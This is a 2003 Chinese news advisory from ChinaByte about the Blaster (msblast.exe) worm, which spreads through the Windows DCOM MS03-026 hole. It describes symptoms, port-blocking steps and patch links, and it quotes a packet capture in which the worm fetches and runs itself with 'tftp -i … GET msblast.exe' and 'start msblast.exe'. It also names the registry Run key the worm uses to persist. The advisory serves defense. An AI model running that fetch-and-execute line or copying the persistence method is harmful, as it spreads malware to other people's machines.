Windows DCOM 蠕虫病毒爆发紧急安全通告
【2003-08-12 23:42】 【】 【ChinaByte】

  8月12日,凌晨1点26分,启明星辰信息技术有限公司积极防御实验室,首先发现利用Windows DCOM MS03-26漏洞为攻击途径的蠕虫病毒已经在国内出现。

  该蠕虫病毒将会感染Windows 2000、Windows XP和Windows Server 2003系统,如果不及时预防,此蠕虫可能会在几天内快速传播、大规模感染网络,对网络安全造成严重危害,甚至其危害程度将超过SQL SLAMMER蠕虫(据不完全统计,SQL-SLAMMER蠕虫已经在全球造成了几十亿美元的损失)。

  有关Windows DCOM MS03-26漏洞的详细分析,启明星辰信息技术有限公司积极防御实验室已经于7月25日发布了详细分析报告,并向所有用户与合作伙伴发出了风险提示信息。。该蠕虫病毒发作时主要表现为:不断扫描计算机的135端口,在局域网中会发现大量的RPC包,因为攻击的成功率不高,所以会导致被攻击的计算机反复重新启动;如果被攻击成功,则会导致许多与RPC(远程过程调用)相关的功能无法使用,如无法利用鼠标右键“复制”、“粘贴”,以及使一些RPC相关的网络功能无法使用,并使得Windows系统极不稳定;此蠕虫将在特殊时段内对windowsupdate.com自动进行DOS攻击,导致网络带宽堵塞,严重影响网络的正常使用;同时,被蠕虫病毒感染(或攻陷)的计算机,会不断扫描其他计算机的135端口,并且重复攻击的全过程。启明星辰公司已经获得了此蠕虫的病毒体。

  启明星辰公司积极防御实验室建议:用户应该尽快关闭135/TCP端口,并尽可能关闭135-139、445与593端口;同时,启明星辰积极防御实验室已就此蠕虫病毒编写了专用除毒程序,请至启明星辰公司网站下载www.venustech.com.cn。同时,微软公司也提供了针对此漏洞的补丁程序,如下:http://www.microsoft.com/technet/security/bulletin/MS03-026.asp。此外,请用户尽快到启明星辰网站用户升级中心,升级天阗(tián)入侵检测系统最新事件库。

  附:Windows Dcom蠕虫安全通告

  蠕虫发现日期:

  2003年8月11日

  紧急程度:高

  危害程度:高

  蠕虫描述:

  -------------------

  从8月11日利用Windows DCOM MS03-26漏洞(对此漏洞的详细分析请见启明星辰网站)为攻击途径的蠕虫病毒开始在国内出现,此蠕虫可能会在这几天内快速的传播如果不及时预防可能会使蠕虫大规模感染网络,这会对网络安全造成严重危害。

  下图为2003年8月11日此蠕虫在国外传播的速度:

  蠕虫技术细节描述:

  --------------------------

  感染途径:

  1.首先源计算机向被感染机135 tcp端口使用dcom.c Windows RPC DCOM漏洞的攻击程序进行攻击

  2.如果攻击成功将会在被攻击计算机上的4444端口上绑定一个shell

  3.通过shell执行 tftp get命令从其他tftp上下载蠕虫程序并且运行

  蠕虫名为:msblast.exe,蠕虫被UPX加密过大小为6kBytes,解压后大小为11kByte。

  4.蠕虫运行后会接着扫描其他漏洞计算机,并向注册表里加一个键值使计算机在从新启动后执行自己

  键名为:

  SOFTWARE\Microsoft\Windows\CurrentVersion\Run, name: 'windows auto update'

  键值为:msblast.exe

  蠕虫特征属性:

  --------------------

  1.此蠕虫会传染Windows 2000和XP,该蠕虫使用了针对这个两个Windows版本的偏移量。攻击时蠕虫会按照80% XP与20% Windows 2000的比率来挑选一种偏移量,所以在攻击时如果偏移量和系统版本不匹配攻击就不会成功。

  2.此蠕虫在特殊时段内会对windowsupdate.com进行DOS攻击,蠕虫会检查系统时间,如果系统时间在8月15到12月31日之间就会执行DOS攻击。

  3.蠕虫IP选择规律是按照本地网络优先的顺序的,首先蠕虫会从本地网络开始:A.B.C.D,D得值为0,如果C大于20会减去一个小于20得随机数,然后蠕虫会以这个数开始递增的顺序攻击,所以当本地网内有机器被感染时,本地网络流量中会有大量的135端口的数据。

  4.在受感染机器4444端口抓包为:

  tftp -i aaa.bbb.ccc.ddd GET msblast.exe

  start msblast.exe

  msblast.exe

  HTTP/1.0 403 Forbidden

  Server: AdSubtract 2.50

  Content-Type: text/html;charset=utf-8

  Content-Length: 349

  <html>

  <head>

  <meta http-equiv="Pragma" content="no-cache">

  <meta http-equiv="Content-Type" content="text/html;charset=utf-8">

  <title>Forbidden</title>

  </head>

  <body>

  <h1>Forbidden</h1>

  <h2>Requests from host hostname.of.attacking.host/aaa.bbb.ccc.ddd not

  allowed; only requests from localhost (127.0.0.1) are allowed.

  </h2>

  </body></html>

【责编:高守】
订阅新闻邮件】 【推荐】 【  】 【打印】 【关闭页面】 【至顶】 【我对此感兴趣
天极社区邀请您:写博客日记  上传相片   论坛聊天  订阅电子杂志  推荐网摘   免费图铃工具
笔名:   请您注意:

 遵守国家有关法律、法规,尊重网上道德,承担一切因您的行为而直接或间接引起的法律责任。

 天极网拥有管理笔名和留言的一切权利。
评论:
 
 相关文章 阅读排行榜
  • Win 2003中IE安全区域的设置技巧
  • 环球电讯:真的事关美国国家安全?
  • IBM力推安全认证 LINUX市场06年可达50亿
  • IDC:反垃圾邮件将推动安全市场在07年增长
  • 锁定安全 家电产品3C认证检测项目简介
  • 安全健康!3C认证对显示器的意义
  • 索尼公布PSP上市细节 索尼中国称无计划引进
  • 腾讯瘫痪事件启示:互联网缺乏健全应急机制
  • 真实内幕 清华同方笔记本电脑为何突然涨价
  • 连连失利 英特尔怎么了?
  • 进退维谷修改免费规则 网易泡泡大餐惹人烦
  • UT斯达康今日发布Q3财报 营收6.45亿美元
  • 要 闻
    ·网络色情屡打不绝 视频聊天室成脱衣舞台
    ·神码背叛联想 转帮竞争对手浪潮分销服务器
    ·奥克斯状告信产部13天仍未立案 吴敬琏声援
    ·徐玉:3G将离我们更近 技术概念渐行渐远
    ·新浪第三季度财报公布 中国网络股全线飘红
    pic
    Copyright (C) 2005 Chinabyte.com, All Rights Reserved 版权所有 天极网络
    渝ICP证B2-20030003号 如有意见请与我们联系 Powered by 天极内容管理平台CMS4i